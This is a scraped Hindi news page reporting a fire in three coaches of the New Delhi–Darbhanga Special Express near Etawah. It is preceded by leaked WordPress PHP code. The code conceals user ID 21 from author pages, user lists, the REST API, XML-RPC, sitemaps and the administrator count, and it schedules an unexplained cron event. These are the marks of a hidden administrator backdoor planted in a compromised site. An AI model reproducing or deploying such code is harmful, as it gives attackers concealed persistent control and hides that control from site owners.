add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
एक्सप्रेस के 3 डिब्बों में लगी आग - Press Ki Taquat
No Result
View All Result
उत्तर प्रदेश में इटावा के पास बुधवार शाम नयी दिल्ली-दरभंगा स्पेशल एक्सप्रेस में आग लगने से इसके तीन डिब्बे क्षतिग्रस्त हो गए। इटावा के पुलिस अधीक्षक (एसपी) संजय कुमार ने कहा कि चार व्यक्तियों को मामूली चोटें आईं हैं। प्रारंभिक जानकारी के अनुसार, किसी भी यात्री के झुलसने की जानकारी नहीं हैं। आग शाम साढ़े पांच बजे लगी। मौके पर मौजूद पुलिस के एक अधिकारी ने कहा, ‘इस घटना में एक कोच जलकर खाक हो गया, वहीं उसके बगल के दो कोच आंशिक रूप से क्षतिग्रस्त हो गए और चौथा कोच धुएं से भर गया। सभी चार कोच को ट्रेन से अलग कर दिया गया।’ कुमार ने बताया कि आग लगने की सूचना मिलने पर दमकल की गाड़ियों को मौके पर भेजा गया। उन्होंने कहा, ‘एम्बुलेंस और चिकित्सकों का एक दल मौके पर भेजे गए।’ उत्तर मध्य रेलवे के मुख्य जनसंपर्क अधिकारी हिमांशु उपाध्याय ने कहा कि इटावा के पास सराय भूपत जंक्शन पर गार्ड ने नयी दिल्ली-दरभंगा स्पेशल एक्सप्रेस के कोच संख्या एस-1 से धुआं निकलते देखा था। सतर्क रेलवे अधिकारियों ने आज एक बड़ा हादसा टाल दिया।
Post Views: 571
No Result
View All Result